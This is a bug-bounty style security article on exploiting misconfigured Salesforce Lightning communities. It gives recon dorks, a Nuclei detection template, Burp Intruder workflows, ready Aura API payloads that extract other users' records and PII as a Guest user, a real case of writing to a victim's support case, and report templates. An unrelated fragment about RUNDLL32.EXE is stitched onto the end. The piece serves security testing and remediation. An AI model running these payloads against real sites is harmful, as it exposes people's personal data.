Throughout this article there will be several new concepts to understand; a brief familiarity with basic DB structures helps.

  • Objects — Effectively acting like database tables
    • Default Object — These are objects provided by Salesforce when the app is created for the first time.
    • Custom Object — These are objects created by admins. The ‘__c’ suffix denotes custom objects and fields.
  • Fields — Can be considered the ‘columns’ of a database. A small set of examples of fields in the ‘User’ object are: AboutMe, CompanyName, CommunityNickname.
  • Records — These are the ‘rows’ of a database (the actual entries of data).
  • SOQL — Salesforce Object Query Language
  • Component — Framework for app development, used for customization of a Salesforce app. It includes the view (markup) and controller (JS) on the client-side, then controller (apex) and database on the server side. Default lightning components for example are ui, aura, and force.
  • Namespace — Think of it like a package, which groups related components together.
  • Descriptor — A reference to a component in the form ‘namespace:component’. For example, ‘force:outputField’ is a descriptor for the ‘outputField’ component in the ‘force’ namespace.

How does Salesforce Lightning implement security?

Prior to going through the exploitation process, it’s imperative to understand the pitfalls of security controls in order to better understand how they are exploited, and also how to ensure your application is as watertight as possible.

From an attacker perspective, the main security controls to be concerned with essentially boil down to the following:

  • Object Level Security (OLS) — This is often referred to as CRUD within Salesforce documentation
  • Field Level Security (FLS)
  • Record Level Security (RLS)

Objects and OLS

Interested in storing data from a customer case? The Case object would be a good idea. New user registered? User object makes sense. I think you get the gist.

OLS allows an admin to completely deny access to an object from an entire profile. As such they have the ability to control who sees what. This makes complete sense, as a sales profile will not need to see the same objects as someone in customer support, and they wouldn’t even know the objects exist.

Object permissions can be modified per User Profile via the Profile tab of the Salesforce instance:

  • Users > Profiles > Select a profile > Click ‘All Object Settings’ > Select an Object -> Click ‘Edit’
example_object_permissions.PNG

Fields and FLS

FLS (field-level security) provides the option to allow specific users to have access to some ‘columns’ and not others. For example, a support site with public discussion would make sense to allow a Guest user to see the CommunityNickname from the User object as it would be shown on posts. However, there is no need to allow Guest users to be able to access the real FirstName and LastName of these users.

Salesforce has implemented some unique access rules to specific objects’ fields, such as the User object. Instances of this are outlined in the object reference documentation.

Access permissions to specific fields in an object can be modified on the same page as that for Object permissions, so following the steps in the previous section will reveal the field permissions when you scroll down.

field_perms.PNG

Records and RLS

Lastly, there are the records which contain the actual data. Ultimately this is where the interesting and sensitive information lies, as it’s nice to know that a ‘Sensitive_Data__c’ field exists in a custom object, but it’s effectively useless if you can only see your own account’s record. This is the concept of RLS, and it’s extremely common considering a person should absolutely have access to their own data and not necessarily others’.

RLS can be implemented in tiers:

  • Organization settings — default level of access everyone has to specific records
  • Role settings — does the case owner role need more access than regular portal user role to records? This is where that can be done at a hierarchy level.
  • Sharing rules — exceptions to organization settings for particular sets of users, not necessarily entire roles.
  • Manual sharing settings — want to give every user in a set except Tom access to more record data? Look no further.
  • Apex managed sharing — Like manual sharing, but done programmatically via Apex or SOAP

Typically, this is done from the top down to allow for finer tuning. Where to find most of these options is outlined briefly below:

Organization wide sharing settings: Navigate to ‘/lightning/setup/SecuritySharing/home’. Sharing rules may also be configured further down this page.

orgsharing.PNG

Roles and role hierarchy: Navigate to ‘/lightning/setup/Roles/home’ > Click ‘Set Up Roles’:

roles.PNG

Manual sharing: Navigate to Setup > Users > Click on a user > Click ‘Sharing’ > click ‘Add’:

manual sharing.PNG

I recommend reading the following document to understand exactly what the different levels of permissions will grant: https://trailhead.salesforce.com/content/learn/modules/data_security/data_security_records

Caveat

Seems simple, right? Salesforce not only provides community alerts for the most glaring issues, which scream at you every time you log in to your dashboard, but 99% of the above can be done visually through a GUI. I mean, look at this example of removing the ‘View All Users’ permission for Guest profiles:

guest_profiles.png

There are also continuous default security improvements for newer orgs with seasonal patches.

Not so fast. Surprisingly, many organisations fail to notice community alerts, or they may simply be older orgs which were created prior to these new patches and have just not gotten around to reading the latest security notes. Not only that, but custom objects are rarely configured with the correct OLS/FLS/RLS.

But, it’s not all nice buttons and fancy GUIs for the developers who want to implement custom blueprints and code for unique functionality. Which brings us on to the next topic, Apex Classes and SOQL.

Apex Classes and Methods

“Apex is a strongly typed, object-oriented programming language that allows developers to execute flow and transaction control statements on the Lightning platform server in conjunction with calls to the Lightning Platform API. Using syntax that looks like Java and acts like database stored procedures, Apex enables developers to add business logic to most system events, including button clicks, related record updates, and Visualforce pages. Apex code can be initiated by Web service requests and from triggers on objects.”

— Salesforce Documentation

The above statement gives a general understanding of what Apex is, but what we’re interested in is how it implements security, and how can we interact with the code created by developers?

The Apex classes that have methods denoted with ‘@AuraEnabled’ are what interest us the most, as these methods can be called remotely through the Aura endpoint, so they are ‘reachable’. My personal favourite thing about exploiting Apex is that it’s not exactly secure by design. User permission checks / FLS / RLS are not implemented by default, as it runs entirely in the system context as opposed to user context.

Salesforce have provided some nice examples of vulnerable Apex class methods within their developer documentation. Below will summarise briefly how security may be implemented at a base level:

  • Classes should be declared using ‘with sharing’ to run in user context
  • In the case of CRUD and FLS:
    • Check read permissions using ‘.isAccessible()’
    • Check update permissions using ‘.isUpdateable()’
    • Check delete permissions using ‘.isDeletable()’
    • Check create permissions using …. guess? 😉
  • SOQL Injection:
    • Binding variables and static queries, and using ‘WITH SECURITY_ENFORCED’

Unfortunately without access to the code itself, exploitation of apex class methods will always be done blackbox unless the class is open source (which is always worth checking). As such, it’s important to be smart about it. Ask yourself the following:

  • Do I have to blindly test this? Perhaps I can crawl the site functionality and a call to the method will be performed at some point. In which case, you now have perfectly formatted data to play around with.
  • Once you peek at the definition (explanation on how to do that later), what are the parameter names hinting at and what variable types are they expecting? A method called ‘updateProfile’ with parameters ‘recordId’ (type aura://Id) and ‘profileName’ (type aura://String) hints massively at what data you should be plugging in. It’s only a matter of getting a profile ID to modify (either by extracting it via insecure object permissions, or perhaps profiles are publicly viewable on the site and as such so are the IDs).

Here is a small sample of issues I’ve found within apex methods:

apex1.PNG
apex2.PNG
apex3.PNG

Recon Process

Now to the exciting part, and no better way to start than actually finding sites using Salesforce. Sites hosted with SF typically point to one of the following via CNAMEs:

  • *.force.com
  • *.secure.force.com
  • *.live.siteforce.com

This can be used in conjunction with tools such as SecurityTrails, which allow searching by DNS record, or Rapid7’s collection of DNS records (fdns_any.json.gz). It’s important to note that *.live.siteforce.com will be prefixed like ‘sub.site.com.<id>.live.siteforce.com’, whereas *.force.com is trickier to spot as the full domain won’t appear in the record. For example, ‘support.butchers.com’ may be hosted on ‘butchersupport.force.com’, so ensure to think of related keywords and organization names when looking through large lists of records.

The following Google dorks may also prove useful:

  • site:force.com
  • inurl:/s/topic
  • inurl:/s/login
  • inurl:/s/article
  • inurl:/s/global-search

Lastly, a crafted POST request to an aura endpoint will throw an easily finger-printable error. Feel free to use the Nuclei template below which tests for this:

id: salesforce-aura

info:
  name: Detect the exposure of Salesforce Lightning aura API
  author: aaron_costello
  severity: info

requests:
  - method: POST
    path:
      - "{{BaseURL}}/aura"
      - "{{BaseURL}}/s/sfsites/aura"
      - "{{BaseURL}}/sfsites/aura"
    body: "{}"
    matchers:
      - type: word
        words:
          - 'aura:invalidSession'
        part: body

Please keep in mind that certain communities may also have a custom $Site.Prefix value such as ‘/business’, ‘/partners’,’/support’ etc et al which will prefix the aura endpoints. Feel free to add these to the template as you find them.

Exploitation

Workflow

When it comes to the exploitation process, I go through a specific workflow in order to ensure that everything is covered. Below is a brief overview of this process. Don’t worry too much right now regarding the information that’s contained in each box, as it’ll all make sense once you’ve completed your reading of the exploitation section, and you can refer back to it.

Starting from Unauthenticated (Guest User):

  1. Pull custom object names
  2. Run intruder attack to retrieve records for objects discovered in (1) and default objects known to keep sensitive information
  3. Pull list views for any objects not returning data from (2) for the ‘Recent’ listId and attempt to extract this data directly (or, query ‘ListView’ object and bruteforce each object with the ListView records disclosed)
  4. Crawl application to enumerate potential apex class methods query-able by Guest users
  5. Attempt to exploit said methods
  6. Authenticate and repeat steps 1-5

In Practice

The first thing you’ll need to do prior to any actual hacking is to populate your headers/cookies and parameter values for ‘/aura’ (I will say ‘/aura’, but it could be any of the endpoints mentioned in the Nuclei template and more). This is why the creation of your own developer community is useful, but feel free to use mine instead.

Navigate to the developer instance with Burp’s proxy sniffing all HTTP(S) requests in the background. Grab any POST request to an aura endpoint and send it to repeater:

aura_query.PNG

Within the repeater tab change the ‘Host’ header and the Burp ‘target’ field to the domain of your target, and we’re ready to go. You’ll notice multiple POST parameters that are consistent across all requests to the aura endpoint, with ‘message’ and ‘aura.token’ being the most important. The ‘message’ parameter contains all of the crucial information such as the apex class and respective method being called, plus parameters (and values) being passed to it. By default it will be URL encoded; decoding it is not necessary but improves readability. The ‘aura.token’ parameter value will show whether or not you are authenticated. The ‘undefined’ value indicates you are not, and hence you are a Guest user. However, if it’s populated with a JWT token, then you are authenticated.

It’s paramount to note that only the ‘message’ parameter in the POST data is to be changed with the payloads, the rest are to remain as they are.

Pull Custom Objects

Replace the ‘message’ parameter value with the following in order to pull custom objects accessible by a Guest user:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{}}

This will return a list of objects within the ‘apiNamesToKeyPrefixes’ key. Search for ‘__c’ within the response and copy any objects suffixed by this, as we know that these are custom.

Extract Data from Objects

Note: From this point onwards we will be using Intruder quite a bit. Each ‘message’ payload will contain a MARKER value which is what you should surround the Intruder markers with, to save myself repeating it every time.

Send this repeater request to the intruder. Within the ‘Positions’ tab, modify the ‘message’ parameter value to the following:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"MARKER","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}

The ‘$getItems’ method in this specific controller is only one example of a built-in method that can be used to extract full record data from an object; there are plenty, however this is the one I typically use. In this payload I’m using pretty much the minimum required parameters for it to work. The full definition for this method and others will be provided at the end of the article. Here’s a little overview of the important parameters:

  • entityNameOrId — Object name
  • getCount — if set to ‘true’, will return the number of records returned
  • pageSize — The larger the number, the greater potential number of records returned. Capped at 1000.
  • currentPage — If you’ve capped the pageSize but there are more records, incrementing the currentPage value will return the records for the next page

Once you’re happy with these values, ensure that the ‘MARKER’ string is surrounded by the intruder markers. Within the ‘Payloads’ tab, paste the custom objects into the Simple List, along with the following:

Case
Account
User
Contact
Document
ContentDocument
ContentVersion
ContentBody
CaseComment
Note
Employee
Attachment
EmailMessage
CaseExternalDocument
Lead
Name
EmailTemplate
EmailMessageRelation


A full list of default Salesforce objects can be found here, as there is likely some I am missing.

Finally, start the attack! Once the attack is complete, I would re-order the results by response length from highest to lowest, as responses shorter than ~12,000 bytes typically mean either:

  1. You do not have access to the object
  2. The only record returned is your own (Guest)

Below is an example `User` object in which the response length indicates a leak:

example_user.PNG

Certain fields in the ‘User’ object will contain null, as they were either not supplied or have additional restrictions as a result of a Salesforce security update as mentioned before. But PII is nearly always available through the ‘Name’, ‘FirstName’, ‘LastName’ fields and occasionally ‘Phone’. In addition to this, some custom fields may be disclosed. Prior to reporting this issue, it’s paramount to ensure this information is not already accessible publicly. If the community has a discussion board where users can post from profiles, this information is likely already accessible. So ensure that throughout the exploitation process, you are not reporting a ‘non issue’.

Specific objects will return IDs, particularly those related to attachments. Here is how to utilise them (These paths are relative to the base path, not the aura endpoint):

  • Document — Prefix 015 — /servlet/servlet.FileDownload?file=ID
  • ContentDocument — Prefix 069 — /sfc/servlet.shepherd/document/download/ID
  • ContentVersion — Prefix 068 — /sfc/servlet.shepherd/version/download/ID

A list of default object ID prefixes can be found here.

Exploiting ListViews

The aim here is to retrieve ListView IDs for the aforementioned sensitive objects, query them for records within the object, and lastly access the records directly. The default view for Lightning at the time of writing is the ‘Recently Viewed’ ListView. Modify the ‘message’ parameter in the Intruder tab to the following, keeping the Intruder payloads the same as before:

  1. Get ListView ID
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewPickerDataProvider.ListViewPickerDataProviderController/ACTION$getInitialListViews","callingDescriptor":"UNKNOWN","params":{"scope":"MARKER","listIdOrApiName":"Recent","listViewTitle":"Recently Viewed","maxMruResults":50,"maxAllResults":100}}]}

2. Copy the ListView records (prefix 00B) and replace the entire Intruder payload list with them. In this case, don’t forget to modify the ‘entityName’ parameter value from ‘OBJECT’ to the object that the ListView records belong to, such as ‘User’. Then, replace the ‘message’ parameter value with the following:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewDataManager.ListViewDataManagerController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"filterName":"MARKER","entityName":"OBJECT","pageSize":100,"layoutType":"LIST","getCount":false,"enableRowActions":false,"offset":0}}]}

3. Lastly, you can attempt to access any returned IDs directly. Copy any IDs returned and replace the Intruder payload list with them. The final ‘message’ parameter value to extract a user’s record is below:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","callingDescriptor":"UNKNOWN","params":{"recordId":"MARKER","mode":"VIEW","layoutType":"FULL"}}]}

The alternative to this would be to extract all of the ListView IDs from the ‘ListView’ default object, then attempt to pair each ListView record to a corresponding object using the query from step 2.

Interacting with Apex Class Methods

Thus far, everything has been quite straightforward and that process will not change for any target. The ability to exploit these insecure methods will separate the wheat from the chaff. First things first, a basic understanding of how to efficiently understand these from a blackbox perspective is important.

When filtering through your Burp Proxy history, or sliding down a mass of requests, there are two simple ways to find any custom apex class definitions or calls:

  1. The string ‘apex%3a%2f%2f’ in the request
  2. The string ‘compound://c’ in the response

I will focus on the second, as ultimately any apex call that is made in a background request will lead you to look for the actual descriptor itself anyway.

Below is a snippet of what you may come across in a response when searching for this string:

"componentDefs":[
{"xs":"G","descriptor":"markup://c:SampleComponent"
..snip..
"cd":{
      "descriptor":"compound://c.SampleComponent",
      "ac":[
        { 
           "n":"getBaseUrl",
           "descriptor":"apex://SampleController/ACTION$getBaseUrl","at":"SERVER","rt":"apex://Map<String,String>",
           "pa":[{"name":"url","type":"apex://String"}]
..snip..

The important values to note here are:

  • The initial ‘descriptor’ value that exists in ‘componentDefs’ — This can be used for retrieving the full definition, although not required. The descriptor format is made up of namespace:component.
  • rt — The return value type. In this case, it’s a Map.
  • pa — Parameters that are passed to the apex class method, and their type. Here the parameter accepted is “url” of type “String”.

Knowing this information, we can attempt to interact with this method and see what it returns. Here’s the constructed message value:

{"actions":[{"id":"46;a","descriptor":"apex://NovaBaseController/ACTION$getBaseUrl","callingDescriptor":"UNKNOWN","params":{"url":"https://google.com/something"}}]}

Let’s break this down into points:

  • id — Completely irrelevant, enter 1337 here if it makes you feel better
  • descriptor — The controller and subsequent method we are calling
  • callingDescriptor — Okay, so technically in an ideal world this would contain the componentDef markup string, but I have not seen it ever required so “UNKNOWN” is accepted across the board
  • params — This JSON object contains the ‘url’ parameter and value that I’ve decided to give it, which is a URL. I simply looked at the parameter name and took a wild guess, welcome to hacking 🙂

Submitting the request returned the following value:

"returnValue":{
     "completeUrl":"https://google.com/something",
     "pathUrl":"/something"
     }

Some of you may be thinking “When searching for custom apex classes, the responses are so cluttered and it’s hard to focus. How do I see JUST the methods for a particular custom class?”. This can be retrieved via the ‘/auraCmpDef’ endpoint. The endpoint itself requires a few pieces of information prior to accessing it, as seen below:

/auraCmpDef?aura.app=<APP_MARKUP>&_au=<AU_VALUE>&_ff=DESKTOP&_l=true&_cssvar=false&_c=false&_l10n=en_US&_style=-1450740311&_density=VIEW_ONE&_def=<COMPONENT_MARKUP>

The values for the ‘aura.app’ and ‘_au’ parameters can be found in two places, side by side. Firstly, when a particular method of a class is called in a request, they can be found in the ‘aura.context’ POST parameter’s value. Secondly, in the response that describes the custom class itself (CTRL+F ‘Application@’):

In the example request above, the ‘aura.app’ value is ‘markup://siteforce:communityApp’ and the _au value is ‘8KVdMoLuAGi15YkxlC35vw’. Lastly, the component descriptor value is required for the ‘_def’ parameter, and you may have noticed one earlier in this subsection. Search for ‘"descriptor":"markup://c’ in the response where these methods are outlined, and copy the entire value of the descriptor.

descriptor.PNG

Plugging in these values would leave us with the following finished path & parameters (Note that the ‘/auraCmpDef’ endpoint is in the same directory as ‘/aura’ is found):

/auraCmpDef?aura.app=markup://siteforce:communityApp&_au=8KVdMoLuAGi15YkxlC35vw&_ff=DESKTOP&_l=true&_cssvar=false&_c=false&_l10n=en_US&_style=-1450740311&_density=VIEW_ONE&_def=markup://c:NOVABaseComponent

Navigating to the URL will perform a 302 redirect to what we seek. Below is a snippet of ‘/auraCmpDef’ output for a built-in method within a component.

Example method description from ‘/auraCmpDef’ for the built-in ‘forceSearch:resultsGridLVMDataManager’.

It’s bad enough that you’re often guessing parameter values for parameters of a String type, but even worse are parameters which expect an object, as you’re now dealing with potentially quite a few blind parameters within said object itself and their respective values. Here’s a fairly obvious and handy trick for this: if a parameter is expecting an object of type ‘aura://User’, check to see if any other apex methods have an ‘rt’ value of ‘aura://User’, and then use the output from that method as the input for the first.

Putting that all together

Now that you’re able to extract data from objects and interact with apex classes, below is a real issue I’ve found which paired the two:

  1. Fetched custom objects and attempted to extract data from each using the getItems method of SelectableListDataProviderController. Object ‘Case_Files__c’ disclosed a Case record ID (Id), case number (caseNum), and S3 bucket file location for case files (acl was private), for all user created support cases.
  2. Authenticating to the application and submitting my own case file while proxying through Burp disclosed a number of methods for a custom apex class in a response. In addition, these methods were being used when I attached my own case files, and as such I was able to gain a greater understanding of their functionality based on inputs that were populated by components automatically and the ‘returnValue’ JSON object in the respective responses of these requests:
     comBucketAttachmentController/ACTION$insertAttach — Uploads the file specified to the case (in conjunction with a POST request to the S3 bucket)
    comBucketAttachmentController/ACTION$updateCaseStatus — Updates the case status (saves it)
    comBucketAttachmentController/ACTION$getCaseAttachments — Shows case attachments for a given case.
  3. The insertAttach method took several parameters such as file size, file name, bucket name etc et al. But most interesting were the ‘caseNumber’ and ‘caseId’ parameters of type ‘aura://String’. Since I already had an example image on the S3 bucket, I attempted to use another user’s case information leaked in the ‘Case_Files__c’ object without having to make a POST request to the bucket. Swapping my ‘caseNumber’ with their ‘caseNum’ value, and ‘caseId’ with their ‘Id’ value from the custom object, I submitted a request and received the same success-style response that I had received when attaching files to my own case (“returnValue”:”success”).
  4. In order to save the file to the case, updateCaseStatus was used which took only a ‘caseId’ parameter. Using the same victim’s Case record ID as the last request, I received a ‘Status Changed’ response. Sensitive identifying information redacted, below is the exact payload used. Notice that I called two apex class methods in the one request, as you are able to call multiple methods within the one message:
{"actions":[{"id":"579;a","descriptor":"apex://comBucketAttachmentController/ACTION$insertAttach","callingDescriptor":"UNKNOWN","params":{"caseId":"<VICTIM CASE ID>","filename":"dog.jpg","bucket":"redacted-support","caseNumber":"<VICTIM CASE NUMBER>","fileType":"image/jpeg","fileSize":"28.8 KB","fileFinal":"dog.20201007-174332.jpg","accountName":"Aaron Costello"}},{"id":"580;a","descriptor":"apex://comBucketAttachmentController/ACTION$updateCaseStatus","callingDescriptor":"UNKNOWN","params":{"caseID":"<VICTIM CASE ID>"}}]}

5. In order to confirm that it was successful, the getCaseAttachments method was used like so:

{"actions":[{"id":"2447;a","descriptor":"apex://comBucketAttachmentController/ACTION$getCaseAttachments","callingDescriptor":"UNKNOWN","params":{"caseId":"<VICTIM CASE ID>"}}]}

6. Result showing that the file was added to the victim’s case (victim info redacted):

case.png

Security Updates

As mentioned in the “How does Salesforce Lightning implement security?” section, Salesforce seasonally rolls out important updates that apply to new communities and can be pushed to existing ones. These updates can, and will, affect the impact of Salesforce misconfiguration findings. As such, it’s vitally important to be aware of changes being made. These release notes can be found here. Relevant sections for this article will be ‘Security, Privacy, and Identity’ and also ‘Communities’. Most of the time, these updates will address the Guest user and their accessibility to specific fields in an object or their ability to interact with “@AuraEnabled” methods. I will do my best to update this section with any significant changes in the future that may affect exploitability in any way.

Spring’21:

  • View All Users Permission to be Removed — Specifically for Guest users. This will affect the visibility Guest users have. This permission was disabled in Summer ’20 and is to be removed now.

Winter’21:

  • Secure Guest User Record Can’t Be Disabled — Private org-wide defaults for guest users & restrictions on the ability to grant record access to them. Unlike before where this could be ‘unchecked’, this update will remove that option and it will be mandatory.
  • Reduce Object Permissions for Guest Users — Disables the following object permissions for Guests: View All Data, Modify All Data, Edit, and Delete.
  • Let Guest Users See Other Members of This Community Setting Disabled — The ability for admins to grant Guest users visibility on other users can reveal PII information, and as such this setting will be turned off by default
  • Improved Security for Managed Topic Images — Communities before Winter’21 have managed topic images stored as documents and are publicly accessible, even if the community is intended to be private. This update will now have these images stored as private.

Payload Glossary

A compiled list of payloads I have discovered over a period of reconnaissance and exploitation of communities. If there are any useful built-in controller methods that are missing, I’d love it if you reached out, and I will add them here with credit.


SelectableListDataProviderController/ACTION$getItems — Returns up to pageSize records, with all fields, from a specific object.

  • entityNameOrId — Object name
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"MARKER","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}

HostConfigController/ACTION$getConfigData — Returns all currently available objects

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{}}

ProfileMenuController/ACTION$getProfileMenuResponse — Returns minor current user details

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.self.service.components.profileMenu.ProfileMenuController/ACTION$getProfileMenuResponse","callingDescriptor":"UNKNOWN","params":{}}]}

ScopedResultsDataProviderController/ACTION$getLookupItems — Returns up to pageSize records for a particular object that include a specific term in a row.

  • scope — Object name
  • term — Search term, minimum 4 characters
  • additionalFields — Any other fields in the object that you wish to be returned in the record
Definition - /auraCmpDef?aura.app=markup://siteforce:communityApp&_au=<VALUE>&_def=markup://forceSearch:resultsGridLVMDataManager
Payload - {"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.search.components.forcesearch.scopedresultsdataprovider.ScopedResultsDataProviderController/ACTION$getLookupItems","callingDescriptor":"UNKNOWN","params":{"scope":"User","term":"script","pageSize":10,"currentPage":1,"enableRowActions":false,"additionalFields":[],"useADS":false}}]}

ListViewPickerDataProviderController/ACTION$getInitialListViews — Returns list views available for a given object from the ‘Recent’ list ID

  • scope — Object name
  • listIdOrApiName — ID of ListView to query
  • listViewTitle — Title of ListView to query
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewPickerDataProvider.ListViewPickerDataProviderController/ACTION$getInitialListViews","callingDescriptor":"UNKNOWN","params":{"scope":"Contact","listIdOrApiName":"Recent","listViewTitle":"Recently Viewed","maxMruResults":100,"maxAllResults":100}}]}

ListViewDataManagerController/ACTION$getItems — Returns records available from a given ListView ID

  • filterName — ID of ListView to query
  • entityName — Object name
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewDataManager.ListViewDataManagerController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"filterName":"<LISTVIEW_ID>","entityName":"<OBJECT NAME>","pageSize":100,"layoutType":"LIST","sortBy":null,"getCount":true,"enableRowActions":false,"offset":0}}]}

DetailController/ACTION$getRecord — Returns the data in a given record ID

  • recordId — ID of the record to query
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","callingDescriptor":"UNKNOWN","params":{"recordId":"<RECORD_ID>","record":null,"inContextOfComponent":"","mode":"VIEW","layoutType":"FULL","defaultFieldValues":null,"navigationLocation":"LIST_VIEW_ROW"}}]}

ApexActionController/ACTION$execute — Alternative way to call an apex class method

  • classname — Name of apex class
  • method — Method being called
  • params — Parameter and value pairs taken by method
{"actions":[{"id":"123;a","descriptor":"aura://ApexActionController/ACTION$execute","callingDescriptor":"UNKNOWN","params":{"namespace":"","classname":"<APEX_CLASSNAME>","method":"<APEX_METHOD>","params":{},"cacheable":false,"isContinuation":false}}]}

Vulnerability Report Templates

If you’re going to use the information in this article to submit reports on bug bounty platforms or via responsible disclosure, I’d appreciate, for the sake of security teams everywhere, if you’d be considerate enough to put effort into the report document. I have taken the liberty of providing some templates below that you may use. Note that the following templates are formatted with Markdown, as this is commonly supported among BB platforms. Naturally the information in these templates should be changed where necessary; they are just ‘general’ templates for object and apex class method misconfigurations. Text that definitely needs to be changed has been surrounded by ‘\*\*’.

Insecure Object Permissions for Guest User

**Title:** [salesforce.site.com] Insecure Salesforce default/custom object permissions leads to information disclosure

* **Risk:** \*Low/Medium/High\*
* **Impact:** \*Low/Medium/High\*
* **Exploitability:** \*Low/Medium/High\*
* **CVSSv3:** \*CVSS_Score\* \*CVSS_STRING\*

**Target:** The Salesforce Lightning instance at `https://salesforce.example.com`.

**Impact:** The Salesforce Lightning instance does not enforce sufficient authorization checks when specific objects are requested. As such, an unauthenticated attacker may be able to extract sensitive data from the records in these objects which contains information of other users. This includes X,Y,Z in addition to other information.

**Description:** The web application at `https://salesforce.example.com` is built using [Salesforce Lightning](https://www.salesforce.com/eu/campaign/lightning/). Salesforce Lightning is a CRM for developing web applications providing a number of abstractions to simplify the development of data-driven applications. In particular, the [Aura](https://developer.salesforce.com/docs/component-library/bundle/aura:component) framework enables developers to build applications using reusable components exposing an API in order for the components to interact with the application.

During testing it was discovered that the Salesforce Lightning instance has loose permissions on the X,Y,Z objects for unauthenticated `Guest` users.

Therefore, a malicious attacker may be able to extract sensitive information belonging to other users of the application. To do this, an unauthenticated attacker may craft a HTTP request directly to the Aura API at `https://salesforce.site.com/s/sfsites/aura`, using built-in controller methods normally used by the Salesforce Lightning components. 

**Steps to Reproduce:**

1) Ensure Burp Suite is sniffing all HTTP(S) requests in the background
2) Navigate to `https://aaroncostello-developer-edition.eu45.force.com/`, this is to retrieve a template aura request for use
3) Find a POST request in Burp's Proxy history to the `/s/sfsites/aura` endpoint. Send it to the repeater
4) Modify both the `Host` header and Burp's target field to `salesforce.example.com`
5) Change the `message` POST parameter to the payload below. Please note that all other parameters should remain untouched, and that in this example payload, a pageSize of 100 is used for speed however more records can be retrieved:

```
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"<OBJECT>","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}
```

6) Submit the request
7) The response contains sensitive information belonging to other users, an example screenshot has been provided below:

{{Screenshot}}

**Remediation:** Enforce [record level security (RLS)](https://help.salesforce.com/articleView?id=security_data_access.htm&type=5) on the vulnerable object to ensure records are only able to be retrieved by the record owner, and privileged users of the application.

Insecure CRUD permissions on custom Apex class method

**Title:** [salesforce.site.com] Insecure CRUD permissions on custom Apex class method

* **Risk:** \*Low/Medium/High\*
* **Impact:** \*Low/Medium/High\*
* **Exploitability:** \*Low/Medium/High\*
* **CVSSv3:** \*CVSS_Score\* \*CVSS_STRING\*

**Target:** The Salesforce Lightning instance at `https://salesforce.example.com`.

**Impact:** The Salesforce Lightning instance is implementing a custom class. One of the methods of this class does not carry-out sufficient CRUD permission checks. As such, an unauthenticated attacker can abuse this method in order to extract data from sensitive fields which are normally not accessible when accessed directly using built-in controller methods.

**Description:** The web application at `https://salesforce.example.com` is built using [Salesforce Lightning](https://www.salesforce.com/eu/campaign/lightning/). Salesforce Lightning is a CRM for developing web applications providing a number of abstractions to simplify the development of data-driven applications. In particular, the [Aura](https://developer.salesforce.com/docs/component-library/bundle/aura:component) framework enables developers to build applications using reusable components exposing an API in order for the components to interact with the application.

During testing it was discovered that the Salesforce Lightning instance has been customized to include a custom class, and method. Namely: \*`apex://ChangeMeController/ACTION$changeMe`\*. This method takes the `\*X\*` and `\*Y\*` parameters as input. 

When called, this method queries the instance for `\*Z\*` using the `\*X\*` and `\*Y\*` parameters, and returns a value in the response. However, the method does not carry out sufficient authorization checks to determine if the \*object/field/record\* requested should be accessible to the user and as such, an attacker may be able to list the values in the \*object/field/record\* for which they do not normally have the permissions to view.

**Steps to Reproduce:**

1) Ensure Burp Suite is sniffing all HTTP(S) requests in the background
2) Navigate to `https://aaroncostello-developer-edition.eu45.force.com/`, this is to retrieve a template aura request for use
3) Find a POST request in Burp's Proxy history to the `/s/sfsites/aura` endpoint. Send it to the repeater
4) Modify both the `Host` header and Burp's target field to `salesforce.example.com`
5) Change the `message` POST parameter to the payload below. Please note that all other parameters should remain untouched:

```
{"actions":[{"id":"123;a","descriptor":"apex://ChangeMeController/ACTION$changeMe","callingDescriptor":"UNKNOWN","params":{"<PARAM1>":"<VAL1>","<PARAM2>":"<VAL2>"}}]}
```

6) Submit the request
7) The response contains sensitive information belonging to other users, an example screenshot has been provided below:

{{Screenshot}}

**Remediation:** Modify the `changeMe` method to ensure that the user is authorized to access the requested data.

A Deep Dive Into RUNDLL32.EXE

A Deep Dive Into RUNDLL32.EXE

Original text by Nasreddine Bencherchali

Image for post
When threat hunting malware, one of the key skills to have is an understanding of the platform and the OS. To make the distinction between the good and the bad, one has to know what’s good first.

On Windows this can be a little tricky to achieve because of the complexity of the OS (after all, it’s a 30+ year old operating system).

Knowing this fact, malware authors write their malware to mimic normal Windows processes. So you’ll see malware disguising itself as an “svchost.exe”, “rundll32.exe” or “lsass.exe” process, exploiting the fact that the majority of people using Windows don’t know how these system processes behave in normal conditions.

Last time we talked about the “svchost.exe” process and its command line options:

Demystifying the “SVCHOST.EXE” Process and Its Command Line Options (medium.com)

Today however we’ll be taking a look at “rundll32.exe” and understanding a little bit more about it.

RUNDLL32.EXE

